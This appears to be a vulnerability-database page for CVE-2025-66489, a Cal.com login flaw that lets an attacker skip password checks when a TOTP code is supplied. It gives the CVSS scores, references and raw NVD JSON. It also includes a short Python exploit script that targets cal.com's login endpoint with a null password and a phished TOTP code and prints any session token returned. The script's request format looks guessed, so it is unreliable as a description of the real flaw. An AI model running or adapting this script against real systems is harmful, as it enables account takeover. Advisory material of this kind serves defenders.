CVE-2025-66489

Description

Cal.com is open-source scheduling software. Prior to 5.9.8, A flaw in the login credentials provider allows an attacker to bypass password verification when a TOTP code is provided, potentially gaining unauthorized access to user accounts. This issue exists due to problematic conditional logic in the authentication flow. This vulnerability is fixed in 5.9.8.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:cal:cal.com:*:*:*:*:*:*:*:* - VULNERABLE

Cal.com < 5.9.8

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-66489 PoC - Cal.com Authentication Bypass import requests import json TARGET_URL = "https://cal.com/api/auth/login" TARGET_EMAIL = "[email protected]" TOTP_CODE = "123456" # Obtained via social engineering/phishing def exploit_auth_bypass(): """ Exploit for CVE-2025-66489: Cal.com TOTP bypass This PoC demonstrates bypassing password verification with valid TOTP """ # Construct malicious request to bypass password verification payload = { "email": TARGET_EMAIL, "totpCode": TOTP_CODE, # Intentionally omit or manipulate password field "password": None } headers = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0 (compatible; CVE-2025-66489-PoC)" } try: response = requests.post(TARGET_URL, json=payload, headers=headers, timeout=10) # Check if authentication was successful (bypass worked) if response.status_code == 200: data = response.json() if "sessionToken" in data or "token" in data: print("[+] AUTHENTICATION BYPASS SUCCESSFUL!") print(f"[+] Session Token: {data.get('sessionToken', data.get('token'))}") return data.get('sessionToken') print(f"[-] Exploit failed. Status: {response.status_code}") print(f"[-] Response: {response.text}") return None except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return None if __name__ == "__main__": print("CVE-2025-66489 - Cal.com Authentication Bypass Exploit") print("=" * 60) exploit_auth_bypass()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-66489
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-66489
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-66489/
[4] VulDB https://vuldb.com/cve/CVE-2025-66489
[5] https://github.com/calcom/cal.com/security/advisories/GHSA-9r3w-4j8q-pw98

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-66489", "sourceIdentifier": "[email protected]", "published": "2025-12-03T20:16:27.057", "lastModified": "2026-02-13T16:03:36.057", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cal.com is open-source scheduling software. Prior to 5.9.8, A flaw in the login credentials provider allows an attacker to bypass password verification when a TOTP code is provided, potentially gaining unauthorized access to user accounts. This issue exists due to problematic conditional logic in the authentication flow. This vulnerability is fixed in 5.9.8."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-303"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:cal:cal.com:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.9.8", "matchCriteriaId": "97D8E07A-0C42-4AD4-8270-3929F5A4D472"}]}]}], "references": [{"url": "https://github.com/calcom/cal.com/security/advisories/GHSA-9r3w-4j8q-pw98", "source": "[email protected]", "tags": ["Third Party Advisory", "Exploit"]}]}}